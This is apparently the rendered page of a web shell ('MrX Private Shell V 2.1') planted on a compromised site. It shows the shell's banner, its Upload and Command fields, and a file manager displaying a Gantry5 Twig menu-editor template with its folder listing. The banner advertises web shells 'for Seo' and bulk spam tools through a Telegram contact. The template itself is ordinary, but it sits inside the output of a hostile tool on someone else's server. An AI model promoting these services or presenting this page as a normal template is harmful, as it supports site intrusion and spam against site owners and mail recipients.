__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
{% extends ajax-suffix ? "@gantry-admin/partials/ajax.html.twig" : "@gantry-admin/partials/base.html.twig" %}

{% set visible = not error and gantry.authorize('menu.manage', id) %}
{% set authorized = visible and gantry.authorize('menu.edit', id) %}

{% block gantry %}
<form method="post" action="{{ gantry.route('menu', id) }}" data-mm-container="">
    <div class="menu-header">
        <span class="float-right">
            <button class="button button-back-to-conf">
                <i class="fa fa-fw fa-arrow-left" aria-hidden="true"></i> <span>{{ 'GANTRY5_PLATFORM_BACK_SETUP'|trans }}</span>
            </button>
            {% if authorized %}
            <button type="submit" class="button button-primary button-save" data-save="Menu">
                <i class="fa fa-fw fa-check" aria-hidden="true"></i> <span>{{ 'GANTRY5_PLATFORM_SAVE_MENU'|trans }}</span>
            </button>
            {% endif %}
        </span>
        <h2 class="page-title">{{ 'GANTRY5_PLATFORM_MENU_EDITOR'|trans }}</h2>
        {% if menus %}
        <select placeholder="{{ 'GANTRY5_PLATFORM_SELECT_ELI'|trans }}"
                data-selectize-ajaxify=""
                data-selectize=""
                data-g5-ajaxify-target="[data-g5-content]"
                class="menu-select-wrap"
        >
            {% for menu_name,menu_title in menus %}
            <option value="{{ menu_name }}"
                    {% if id == menu_name %}selected="selected"{% endif %}
                    data-data="{{ {url: gantry.route('menu', menu_name)}|json_encode|e('html_attr') }}">
                {{ menu_title }}{{ default_menu == menu_name ? ' ★' : '' }}
            </option>
            {% endfor %}
        </select>
        {% endif %}
    </div>

    {% if error %}
        <div class="alert alert-danger">{{ error.message }}</div>
    {% elseif not authorized %}
        <div class="alert alert-danger">{{ 'GANTRY5_PLATFORM_MENU_EDIT_UNAUTHORIZED'|trans }} {{ 'GANTRY5_PLATFORM_MENU_EDIT_UNAUTHORIZED_PLATFORM'|trans }}</div>
    {% endif %}

    {% if authorized %}
    <div class="g5-mm-particles-picker">
        <ul class="g-menu-addblock">
            {% if gantry.platform.has('modules') %}
            <li data-mm-blocktype="module" data-mm-id="__module">
                <span class="menu-item">
                    <i class="far fa-fw fa-hand-paper" aria-hidden="true"></i>
                    <span class="title">{{ 'GANTRY5_PLATFORM_MODULE'|trans }}</span>
                </span>
                <a class="config-cog" href="{{ gantry.route('menu/select/module') }}">
                    <i aria-label="{{ 'GANTRY5_PLATFORM_MENU_MODULE_SETTINGS'|trans }}" class="fa fa-cog" aria-hidden="true"></i>
                </a>
            </li>
            {% elseif gantry.platform.has('widgets') %}
            <li data-mm-blocktype="widget" data-mm-id="__widget">
                <span class="menu-item">
                    <i class="far fa-fw fa-hand-paper" aria-hidden="true"></i>
                    <span class="title">{{ 'GANTRY5_PLATFORM_WIDGET'|trans }}</span>
                </span>
                <a class="config-cog" href="{{ gantry.route('menu/select/widget') }}">
                    <i aria-label="{{ 'GANTRY5_PLATFORM_MENU_WIDGET_SETTINGS'|trans }}" class="fa fa-cog" aria-hidden="true"></i>
                </a>
            </li>
            {% endif %}
            <li data-mm-blocktype="particle" data-mm-id="__particle">
                <span class="menu-item">
                    <i class="far fa-fw fa-hand-paper" aria-hidden="true"></i>
                    <span class="title">{{ 'GANTRY5_PLATFORM_PARTICLE'|trans }}</span>
                </span>
                <a class="config-cog" href="{{ gantry.route('menu/select/particle') }}">
                    <i aria-label="{{ 'GANTRY5_PLATFORM_MENU_PARTICLE_SETTINGS'|trans }}" class="fa fa-cog" aria-hidden="true"></i>
                </a>
            </li>
        </ul>
    </div>
    {% endif %}

    {% if visible %}
    <div id="menu-editor"
         data-menu-ordering="{{ menu.ordering|json_encode|escape('html_attr') }}"
         data-menu-items="{{ menu.items(false)|json_encode|escape('html_attr') }}"
         data-menu-settings="{{ menu.settings|json_encode|escape('html_attr') }}">
        {% if menu.items|length %}
            {% include 'menu/base.html.twig' with {'item': menu.root} %}
        {% else %}
            {% include 'menu/empty.html.twig' with {'item': menu.root} %}
        {% endif %}
    </div>

    <div id="trash" data-mm-eraseparticle=""><div class="trash-zone">&times;</div><span>{{ 'GANTRY5_PLATFORM_DROP_DELETE'|trans }}</span></div>
    {% endif %}
</form>
{% endblock %}

Filemanager

Name Type Size Permission Actions
edit.html.twig File 1.57 KB 0664
menu.html.twig File 4.58 KB 0664
menuitem.html.twig File 1.69 KB 0664
particle.html.twig File 2.94 KB 0664
Filemanager